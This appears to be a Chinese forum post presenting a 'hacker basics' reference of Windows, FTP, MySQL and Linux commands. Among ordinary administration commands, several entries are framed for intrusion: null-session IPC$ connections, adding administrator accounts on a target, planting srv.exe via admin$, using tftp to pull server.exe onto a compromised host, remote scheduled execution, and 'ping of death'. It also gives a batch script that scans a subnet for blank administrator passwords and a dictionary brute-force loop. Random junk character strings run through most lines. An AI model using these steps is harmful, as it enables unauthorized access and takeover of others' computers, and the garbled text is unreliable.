黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
5 d3 K; f# d% Q# M7 @4 c  Jnet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 $ P0 @! g; o& H* D3 F0 W* [5 o/ ?1 g
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
$ M* T5 F. X4 M! i: {net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: " Q! Z" \5 M9 `; B, [3 |  ~& x: e% ]
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 . M4 G' P5 f' o1 D/ }& \
net use h: /del 删除映射对方到本地的为H:的映射 ! V0 G1 S" z. _2 _; }
net user 用户名　密码　/add 建立用户 ' ~5 @. j1 B; e' i5 D" @; s
net user guest /active:yes 激活guest用户
) l* J/ _" t9 r% k8 L8 R9 Wnet user 查看有哪些用户 , r3 O! F" B% U. L" I& s
net user 帐户名 查看帐户的属性 " y" f/ ]3 s9 ~) ]8 ?; j
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数 # g8 |- b& I9 S# X
net start 查看开启了哪些服务
+ W+ P( ?5 n3 ]: \2 i- ^) Hnet start 服务名　 开启服务；(如:net start telnet， net start schedule) " z9 B/ k( T7 J* H8 z
net stop 服务名 停止某服务
' f5 ]; ^2 m7 t3 w! ^. B8 D% o7 pnet time \\目标ip 查看对方时间 0 u- C6 Y4 p+ p7 N' h
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 " W+ G7 h9 i5 y; ?! D
net view 查看本地局域网内开启了哪些共享 - Y4 S6 H9 o) @7 k) X( z6 H
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 : H$ g% M3 A" l4 o
net config 显示系统网络设置
$ |% e% J- ?+ \6 k. g" rnet logoff 断开连接的共享
& x: I  U* \5 c3 ~) I# _net pause 服务名 暂停某服务 * N% X1 x# k6 A' k. g
net send ip "文本信息" 向对方发信息
1 [  g+ x% T' t8 }, ?+ Snet ver 局域网内正在使用的网络连接类型和信息
$ q  X6 \2 S6 a6 ~( f; cnet share 查看本地开启的共享 : P0 o- x5 A4 H
net share ipc$ 开启ipc$共享
2 {/ K( u: t( W; {5 ]net share ipc$ /del 删除ipc$共享
" J+ |4 ~) y' o- b' [! Rnet share c$ /del 删除C：共享
9 b( ]6 }( _# L' t) m/ Gnet user guest 12345 用guest用户登陆后用将密码改为12345
- @7 L$ Z4 E# a, dnet password 密码 更改系统登陆密码 ) K8 k, U; S- t
netstat -a 查看开启了哪些端口,常用netstat -an $ R, {8 ]. k- M, A4 @$ w
netstat -n 查看端口的网络连接情况，常用netstat -an
  H- g; |3 f2 l( {. Vnetstat -v 查看正在进行的工作 6 Y: G& c4 P2 j
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） 0 R4 T8 }+ d+ L" t3 \
netstat -s 查看正在使用的所有协议使用情况
, X3 u. k( {7 `, Y/ Ynbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
5 q) x# ^0 S0 h- u$ Ftracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
' S8 H- U) E- `/ [  H. s- xping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
* {  j5 z- w! @2 g! g' Eping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) 1 K+ I; D% ^, ~7 A7 N! b. Q
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
8 a6 T. B7 f6 o1 h6 ltlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) : y. z( T" v% L, w$ \$ |+ @
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 0 [% v/ {/ V9 z* V! D0 B
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 & g) u  a8 v5 C- i7 G
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） ) d! a5 c4 o( p( \3 B7 P
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 9 q% a, v9 `: x. `2 [! Z/ s% l
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
4 E3 h  {) `7 n0 L  nat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
# U/ z" a7 M! r1 P& p/ Rat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 2 x$ u+ V2 S( h4 ?
at id号 /delete 停止某个已注册的计划任务
3 b+ D5 R+ @3 r2 }0 Gat 查看所有的计划任务
9 t& P" i/ W: T  c% Cat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
3 z5 @6 ~: g% \" {; E8 J, q# m) yfinger username @host 查看最近有哪些用户登陆
  {" s% W  A/ G; A4 v" m! gtelnet ip 端口 远和登陆服务器,默认端口为23
" u2 F# Z: Q, F- K, l( {open ip 连接到IP（属telnet登陆后的命令）
- u3 t+ b2 x- \( jtelnet 在本机上直接键入telnet 将进入本机的telnet ( `. {) Y6 L2 X- k9 r/ _8 X" g
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
! S! R* R7 X0 E6 A6 J* q9 Qcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 1 f$ i1 e1 |$ T3 v, k
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 * C# T. n8 e$ h* ?, U: ]
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： ( ?7 v! m9 ?9 R8 G# E8 E
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
  |: a2 `# r: v. }4 Etftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
/ [; F; P# a" L" F* Htftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机
" N3 A3 R* S2 L1 L" mftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
, k4 R( Y3 Z/ V2 p5 Oroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
# c% Q6 _, F  U) X9 K5 Marp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 $ q: D+ q5 u  Q  S0 t" M. J
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
; g8 |) @+ _3 T' d; i: xmem 查看cpu使用情况 4 e1 ^5 ?( \; L5 P* t
attrib 文件名(目录名) 查看某文件（目录）的属性
8 E) K% d+ q' @) q8 l8 @0 kattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
/ g7 A1 e6 i, j4 ddir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 4 h5 m. V5 B; D" W' J/ T" Y1 G; O, B
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
) }/ @' m3 O. gset 指定环境变量名称=要指派给变量的字符 设置环境变量
3 N' h; `; b9 E$ Bset 显示当前所有的环境变量 ( z. c1 w( p) `
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
) ?+ `& a$ D2 c% \/ K3 Fpause 暂停批处理程序，并显示出：请按任意键继续.... 6 ], o: p7 o& ]3 |4 p
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
  h9 k1 @6 @) J5 P: wgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） ' O& B) R' o' h; Y2 F- e! p2 J
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
7 m2 r9 p- L7 K& e7 D1 @- Vfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
7 o- ^- d, ]% T, Jecho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 " p; b6 U8 V' g+ \' T. H
echo 信息 在屏幕上显示出信息 1 O* S  _6 y8 X; K: R! D: B4 m; S
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中 ! T% M" K' C/ w. w* ~2 z4 p
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
9 @3 k+ J+ D$ P  Cfind 文件名 查找某文件 : l8 s$ b$ J" j7 y9 K+ j
title 标题名字 更改CMD窗口标题名字
/ ?) m$ o. X' Y9 g2 U, N! ocolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白   h5 ~  |: b! a; r! |, Q/ }# Y' F
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) 7 V0 a& m; T8 W$ ?- Y3 ^* Z
print 文件名 打印文本文件
! C: d& z% N; kver 在DOS窗口下显示版本信息
  X/ t! l" Z) [, ywinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
* J/ ~9 o$ R$ z% X. O0 n# iformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
: E& [( ?4 J- n0 r; omd　目录名 创建目录 / E* a/ r3 [8 C% d4 m" D* X
replace 源文件　要替换文件的目录 替换文件 1 A- F; }/ v0 f8 V- X' R/ T
ren 原文件名　新文件名 重命名文件名
: n" X% l# J0 x! ktree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 / v* N8 g! \+ F( ~0 e2 |) d
type 文件名 显示文本文件的内容 , h) ?$ i. C4 C, j+ G9 ]$ E& z
more 文件名 逐屏显示输出文件
6 o( ^" c6 O0 G  k# o1 U- {doskey 要锁定的命令＝字符6 z" t. I5 l/ D, O6 |$ R' R3 H
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= ; N- j: H, r, Y+ _
taskmgr 调出任务管理器
+ _  Q  i' B$ r+ ?$ {chkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 5 p# l! f1 ?2 W4 j+ Q) F$ P
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口 ' d; w/ N( q9 `* k
exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
! M( i! J, W+ P2 C6 l/ m8 mpath 路径\可执行文件的文件名 为可执行文件设置一个路径。 ( s/ |2 E* g- A4 {
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? ) b, e" g; Z: h( P+ \1 r# f7 E7 x
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
) p. T* Y5 J  q8 [/ U8 L6 ~) Pregedit /e 注册表文件名 导出注册表
7 p6 V2 X$ E2 E. B0 u6 s/ Ncacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。 * c& r% r) F( L0 d5 ^& W
cacls 文件名 查看文件的访问用户权限列表
; X5 A- T3 H" \  |" a( A' yREM 文本内容 在批处理文件中添加注解
# p3 ~: x6 K) R6 p8 Wnetsh 查看或更改本地网络配置情况9 D) ~9 b0 N# k
IIS服务命令：
% }5 O1 T) _, h/ a5 F- R) l0 V/ b' Jiisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） & k  a  f* W+ R% a2 s
iisreset /start或stop 启动（停止）所有Internet服务 ( ^2 A  ]3 m% l  [' }  B- u* E
iisreset /restart 停止然后重新启动所有Internet服务 # T3 l8 Z  ]! N
iisreset /status 显示所有Internet服务状态
, M! ^! j0 N: ~- V& V' liisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 ' e2 n- [1 w6 T
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
4 m% g! \: b- T, l5 niisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
7 E& h  j% d+ V8 \7 C4 I- c4 fiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
9 w3 a) ^4 y! _; H" PFTP 命令： (后面有详细说明内容) : G4 E" _  }2 E- h
ftp的命令行格式为:
9 C1 _: w( e' r- n6 mftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
$ T7 q% G. |) l: D－d 使用调试方式。 : F5 b) z- q( V( Y; _
－n 限制ftp的自动登录,即不使用.netrc文件。: n* \2 P  y- M. S# ]5 X8 t
－g 取消全局文件名。
- b5 m2 Y4 |$ Q9 ~help [命令] 或 ？[命令] 查看命令说明 ! ?6 \* ]7 ?  \: v
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
: N, o: `0 d4 |3 E) o# {7 Mpwd 列出当前远端主机目录 ) n5 A, Q/ |, f% ^  K
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 6 Q6 D- q' p  v5 K% i
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
# Q) c' y. |8 u! Lmget [remote-files] 从远端主机接收一批文件至本地主机 3 ^+ B6 p8 C: _, p+ {
mput local-files 将本地主机中一批文件传送至远端主机
# |7 {7 ?4 Y5 W6 i6 X3 m, c% cdir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 3 U; Z6 a$ c4 q
ascii 设定以ASCII方式传送文件(缺省值) 4 e; J3 N  [) v
bin 或 image 设定以二进制方式传送文件   B! e4 {9 r, L( |! X
bell 每完成一次文件传送,报警提示 ) v' ]; s7 S  Q6 \/ o1 }+ Z; q
cdup 返回上一级目录 3 L+ e: F" g0 s
close 中断与远程服务器的ftp会话(与open对应)
# h8 E( b3 B$ h9 v" S$ `  fopen host[port] 建立指定ftp服务器连接,可指定连接端口 ) l6 {% b: y  l4 u: n
delete 删除远端主机中的文件
' u# b0 [: W4 S4 G' pmdelete [remote-files] 删除一批文件 ) }' ?7 t) d* F% x1 ?8 r1 I$ V
mkdir directory-name 在远端主机中建立目录
: m# r" f6 |! `& t8 j. @2 lrename [from] [to] 改变远端主机中的文件名 ! u2 ?7 {4 Y5 P- C( y
rmdir directory-name 删除远端主机中的目录 0 _# f% ?1 Z! q0 \
status 显示当前FTP的状态
, _) S- l6 ?" a2 [2 A/ tsystem 显示远端主机系统类型 * l& C8 B' L4 B, M  U5 n
user user-name [password] [account] 重新以别的用户名登录远端主机
# v+ R, ^* `; n# w- y2 ]' lopen host [port] 重新建立一个新的连接
; J( X: ^  _+ q  [6 E/ O6 Z& dprompt 交互提示模式
/ ?+ G& K7 E7 n" v  q7 Amacdef 定义宏命令
4 B4 K+ V5 O3 S( O. rlcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
( A$ ~+ X; |5 e: c: y: _chmod 改变远端主机的文件权限
& {; X$ \8 U/ O8 g+ ucase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
  s  U+ v  \  h! A: d$ Q  xcd remote－dir 进入远程主机目录
, ~' c9 Q! _0 r# J+ ~cdup 进入远程主机目录的父目录
& w' e! S! K- N$ i+ U% z6 L9 F! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip / u$ l9 v! e6 ~  a9 x
MYSQL 命令： 3 @+ D/ G! E8 B! E) m+ T% q
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。8 V7 x! ?2 N  L( d- ]
（例：mysql -h110.110.110.110 -Uroot -P123456
; y) J) u: |5 a7 N注:u与root可以不用加空格，其它也一样） - M: s4 V$ r+ O3 x' G% d
exit 退出MYSQL - N1 \- v* [7 ^, @, Y2 \7 u% O0 j
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
! G2 b0 q1 r4 E0 i5 Vgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符）
: u5 W( \1 i0 n5 [. i2 dshow databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
& W$ \0 X4 T; ?: M: f# S) f/ Cuse mysql；
/ P6 u( z$ i' o6 t/ T0 ~1 wshow tables; 显示库中的数据表
; O. X! S2 O) W: i) T& C& `- g6 ?) }describe 表名; 显示数据表的结构 ) u+ S9 j( B' w
create database 库名; 建库 , G4 \$ n7 w9 D, n' @' g
use 库名；0 X* o& [7 e8 S* E
create table 表名 (字段设定列表)； 建表
' g! [+ b5 W1 U, C+ v/ vdrop database 库名;
3 r1 R/ J# h; B6 C$ ydrop table 表名； 删库和删表
2 h! K9 z- H( Y3 i  `1 H$ Rdelete from 表名; 将表中记录清空
* T2 i& h; i# Hselect * from 表名; 显示表中的记录 ) u( a( d& C' [4 X  A, H; `# P5 v
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
' i9 S2 O6 d" @/ S$ Rwin2003系统下新增命令（实用部份）： 0 K7 E/ y! @) u. Y
shutdown /参数 关闭或重启本地或远程主机。
; t$ B6 K4 o0 K参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。3 V/ U4 p) l% O( ^5 g8 D
例：shutdown /r /t 0 立即重启本地主机（无延时）
: k2 f# i5 N' }* f3 u: d0 Ttaskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
( z, c5 n% a" N  d/ L1 h1 q/ a4 M参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 ! N, C  j0 Z0 `- \! U7 \5 p
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。0 `2 [: `0 @% T2 u2 {* W
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程" N8 [1 u( D& g( x, L9 d1 h; n
Linux系统下基本命令： 要区分大小写, P( y/ `$ Y9 d9 D
uname 显示版本信息（同win2K的 ver）
( J! M( {# r+ @dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） 5 V. ?8 g  @& \7 ~0 G
pwd 查询当前所在的目录位置 0 p6 q) u. ]  R5 ?; U
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 " i5 }( r; W4 p& z' T
cat 文件名 查看文件内容
, M5 Y& l" [( v3 h1 A# X1 Kcat >abc.txt 往abc.txt文件中写上内容。
0 [. f  X5 E2 ^, nmore 文件名 以一页一页的方式显示一个文本文件。
( v0 w7 J) @; ^9 O( o9 hcp 复制文件 % R7 e3 F# p: a& S
mv 移动文件
; m; K, M2 v5 I3 ]  a: J& Drm 文件名 删除文件，rm -a 目录名删除目录及子目录
/ Y6 W' u% {6 M6 r' [mkdir 目录名 建立目录 ) L' D) u/ o  }
rmdir 删除子目录，目录内没有文档。 9 g* _( M. k( I. P  O4 E. }
chmod 设定档案或目录的存取权限
# z/ K1 i- A5 l2 a) ]0 Ugrep 在档案中查找字符串 ) i! m  K+ D2 s8 Q5 t5 ~3 ^
diff 档案文件比较 5 ^1 \! x" r) D: l1 h
find 档案搜寻
( G2 \9 ^; M9 P+ J0 \" Ndate 现在的日期、时间 . Y# [( Z( Q" E. d
who 查询目前和你使用同一台机器的人以及Login时间地点
3 C, q* F& G* R, b, A8 S. Kw 查询目前上机者的详细资料
8 s+ `. p2 V# u3 ^3 l* iwhoami 查看自己的帐号名称   `' d; n. r: U& X
groups 查看某人的Group
  }2 f- f; @* {8 H# Z$ T  hpasswd 更改密码 ' f2 w" P6 @+ n- c
history 查看自己下过的命令
# W6 P* e$ T3 o$ }. n' Gps 显示进程状态
0 ~, @( h" U, {) \# E6 e$ Ikill 停止某进程
3 Y9 c0 U8 C, D: J7 f% a& }gcc 黑客通常用它来编译C语言写的文件
" _0 W  y% {2 I6 H( M7 O' ?su 权限转换为指定使用者 : Z, O- P( `( F6 u' @
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 2 W; {4 h& Q: r3 s
ftp ftp连接上某服务器（同win2K+ F+ M" y: }5 o2 q; f* m' {2 n8 d6 H
附：批处理命令与变量# c, Y! M6 L; _& l' y' L
1：for命令及变量 基本格式： % G) ~/ ^: i( l2 o# T0 o" K- }
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
) _* D' r) p- j, R0 O批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3( w" _  x9 O9 a* z5 u
(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}/ e, {0 M( x$ v
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
. k" N$ f& B, h$ Qcommand_parameters：为特定命令指定参数或命令行开关+ F7 L6 ?0 y5 V, k
IN (set)：指在(set)中取值；DO command ：指执行command$ X2 H4 m& F* _; H; N& h% x
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。 0 N* U$ J9 }& o! B  I( O
用法举例：
  {+ a* {. ~$ F, {* X% C  U@echo off * a, N: i& k/ ^+ j8 J/ C
echo 用法格式：test.bat *.*.* > test.txt
" d" }* I8 O( I& Y2 P2 p8 }for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
, o  Y/ v2 U* |6 |存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。$ T. r/ r2 \( H$ b% B# z
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
' S! `2 K4 i" _7 a@echo off & x1 B: R' ]' F" z  h- i' V& o
echo 用法格式：ok.bat ip # F. ^: P& D' R! {. ?# C3 @3 d  e) r3 o
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
$ U2 e# W) N: s3 ?+ H存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。( G2 n3 s* O1 u6 {
2：if命令及变量 基本格式： # Y. \+ ~% H4 g& v
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
5 c2 n7 P4 `$ Q1 B例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
7 X3 |" ]; f; s9 X& t+ x0 指发现并成功执行（真）；1 指没有发现、没执行（假）。   y0 [% p9 ~/ g# Q0 b1 c: x
IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
! [; P9 U( N% P2 c: t例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） ( T7 D5 h% r9 C) p, ^0 h' X
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。  u& B/ o8 U/ H- u* K# Q; v) [
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
& F1 R5 C0 W9 g' J4 {5 hIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”